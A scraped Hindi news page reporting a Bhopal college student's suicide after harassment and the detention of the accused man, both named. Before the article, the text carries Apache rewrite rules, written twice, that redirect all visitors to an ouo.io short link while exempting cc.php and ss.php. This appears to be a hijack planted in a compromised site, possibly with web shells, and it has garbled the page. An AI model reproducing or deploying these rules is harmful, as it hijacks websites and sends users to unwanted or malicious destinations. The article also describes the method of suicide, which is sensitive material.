
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 875
Previous Nextभोपाल। मध्य प्रदेश की राजधानी भोपाल में एक बेहद दिल दहलाने वाला मामले सामने आया है। यहां एक छात्रा ने छेड़खानी से तंग आकर फांसी लगाकर खुदकुशी कर ली। छात्रा ने सुसाइड करने के पहले अपनी सहेली को कुछ मैसेज भी किए थे। साथ ही अपनी मां से पूछा था कि, 'क्या बेटी होना कलंक है? पुलिस ने मामला सामने आने के बाद आरोपी युवक को गिरफ्तार कर लिया है। यह मामला राजधानी के गौतम नगर इलाके का है। यहां बी. कॉम. सेकंड इयर की छात्रा आरती रॉय ने अपने ही घर पर फांसी लगाकर खुदकुशी कर ली। आरती के पिता ड्राइवर है, जबकि मां निजी कंपनी में जॉब करती है। घटना के वक्त माता-पिता काम पर गए थे, जबकि नौंवी में पढ़ने वाला छोटा भाई बाहर खेल रहा था। परिजनों ने आरोप लगाया है कि दानिश नाम के युवक की छेड़छाड़ से तंग आकर ही आरती ने मौत को गले लगा लिया। मां ने कहा कि दानिश ने कुछ दिनों पहले बेटी के पैर पर भी दोपहिया वाहन चढ़ा दिया था। वह दानिश की वजह से इतनी परेशान थी कि कॉलेज जाने से भी डरने लगी थी। पड़ोसी या कोई रिश्तेदार ही उसे कॉलेज छोड़ने और लेने के लिए जाते थे। बताया जा रहा है कि दानिश ने शनिवार को आरती के साथ मारपीट भी की थी। इसके बाद ही वह कॉलेज से जल्दी घर आ गई और बाद में उसने फांसी लगा ली। छात्रा ने सुसाइड करने के पहले अपनी एक सहेली को व्हॉट्सऐप पर मैसेज किए थे। इन मैसेज में दानिश के परेशान करने का जिक्र किया था।
उधर, मामले की सूचना मिलते ही पुलिस ने तुरंत कार्रवाई करते हुए दानिश को हिरासत में ले लिया है। साथ ही परिजनों के बयान को आधार मानते हुए जांच को आगे बढ़ाया जा रहा है।